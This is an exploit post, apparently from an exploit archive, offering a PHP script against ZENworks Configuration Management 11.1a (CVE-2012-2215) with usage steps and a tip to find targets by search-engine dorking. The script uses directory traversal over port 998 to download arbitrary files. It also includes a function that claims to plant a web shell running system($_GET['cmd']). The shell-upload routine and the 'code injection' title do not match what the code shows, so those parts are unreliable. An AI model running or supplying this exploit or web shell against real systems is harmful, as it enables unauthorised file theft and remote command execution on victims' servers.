=============================================================================================================================================
| # Title : ZENworks Configuration =============================================================================================================================================
| # Title : ZENworks Configuration Management 11.1a PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.opentext.com/products/zenworks-suite |
=============================================================================================================================================
POC :
[+] Dorking ?n Google Or Other Search Enggine.
[+] Code Description: A custom packet is sent to port 998 to get a specific file from the file system. I have added comments in the code to explain the main operations.
Support for all operating systems and the ability to upload a web shell to the code. Now you can use the uploadWebShell function to upload a web shell to the desired path
( https://packetstorm.news/files/id/181219/ CVE-2012-2215 )
[+] save code as poc.php.
[+] Set Target : line 84
[+] USage : php poc.php
[+] PayLoad :
<?php
class NovellZenworksExploit {
private $ip;
private $port;
private $filePath;
private $depth;
public function __construct($ip, $port = 998, $filePath = '\\WINDOWS\\system32\\drivers\\etc\\hosts', $depth = 6) {
$this->ip = $ip;
$this->port = $port;
$this->filePath = $filePath;
$this->depth = $depth;
}
public function exploit() {
if (empty($this->filePath)) {
echo "Please supply the name of the file you want to download\n";
return;
}
$travs = str_repeat("\\..", $this->depth);
if ($this->filePath[0] !== "\\") {
$travs .= "\\";
}
$travs .= $this->filePath;
$payload = mb_convert_encoding($travs, 'UTF-16LE');
$packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
$sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
if (!$sock) {
echo "Connection failed: $errstr ($errno)\n";
return;
}
fwrite($sock, $packet);
fread($sock, 4); // Ignore first 4 bytes
$lengthData = fread($sock, 4);
if (!$lengthData) {
echo "Unable to get length due to a timeout\n";
fclose($sock);
return;
}
fread($sock, 0x210 - 8); // Skip unnecessary data
$length = unpack("V", $lengthData)[1];
$contents = fread($sock, $length);
if (!$contents) {
echo "Unable to extract contents due to a timeout\n";
fclose($sock);
return;
}
fclose($sock);
echo "File retrieved successfully!\n";
$fname = basename($this->filePath);
file_put_contents($fname, $contents);
echo "File saved in: $fname\n";
}
public function uploadWebShell($shellContent, $destination = '/var/www/html/shell.php') {
$sock = fsockopen($this->ip, $this->port, $errno, $errstr, 5);
if (!$sock) {
echo "Connection failed: $errstr ($errno)\n";
return;
}
$payload = mb_convert_encoding($destination, 'UTF-16LE');
$packet = pack("N", 0x21) . pack("N", strlen($payload)) . $payload;
$packet .= mb_convert_encoding($shellContent, 'UTF-16LE');
fwrite($sock, $packet);
fclose($sock);
echo "Web shell uploaded successfully at: $destination\n";
}
}
// ???? ??? ?????????
$exploit = new NovellZenworksExploit('192.168.1.1');
$exploit->exploit();
// ??? ??? ??
$shell = "<?php system(\$_GET['cmd']); ?>";
$exploit->uploadWebShell($shell, '/var/www/html/shell.php');
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================
ZENworks Configuration Management 11.1a Shell Upload
- Details
- Written by: khalil shreateh
- Category: Vulnerabilities
- Hits: 95